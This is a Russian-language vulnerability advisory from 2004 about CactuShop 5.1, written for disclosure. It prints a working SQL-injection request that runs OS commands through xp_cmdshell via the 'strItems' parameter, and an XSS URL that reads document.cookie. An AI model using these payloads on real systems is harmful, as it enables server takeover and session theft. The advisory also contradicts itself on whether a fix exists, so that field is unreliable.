| Дата публикации: | 02.04.2004 |
| Всего просмотров: | 1360 |
| Опасность: | Средняя |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Неавторизованное изменение данных |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | CactuShop 5.x |
| Уязвимые версии: CactuShop 5.1
Описание: Несколько уязвимостей обнаружено в CactuShop. Удаленный пользователь может внедрить SQL команды и выполнить произвольные команды операционноц системы. Удаленный пользователь может выполнить XSS нападение. Сценарии 'mailorder.asp' и 'payonline.asp' не проверяют данные, представленные пользователем в параметре 'strItems'. Пример: strAgain=yes&CD_EmailAddress=dummy@someemailservice.com&CD_Password=& CD_AffiliateID=&CD _CardholderCountry=200&CD_ShippingCountry=200& CD_ShippingPostcode=&strPaymentSystem=email&CP_CouponCode=&numLanguageID=1& numCurrencyID=1&numItemCount=2&strItems=214;+ exec+master..xp_cmdshell+'dir+c:'--z165z& strQuantities=6z2z&numShipMethod=1&btnProceed=ProceedТакже сообщается что сценарий 'largeimage.asp' не фильтрует HTMl код, представленный пользователем: http://[target]/popuplargeimage.asp?strImageTag=<script>alert(document.cookie)</script> URL производителя:http://www.cactushop.com/main/default.asp Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | S-Quadra Advisory #2004-03-31 |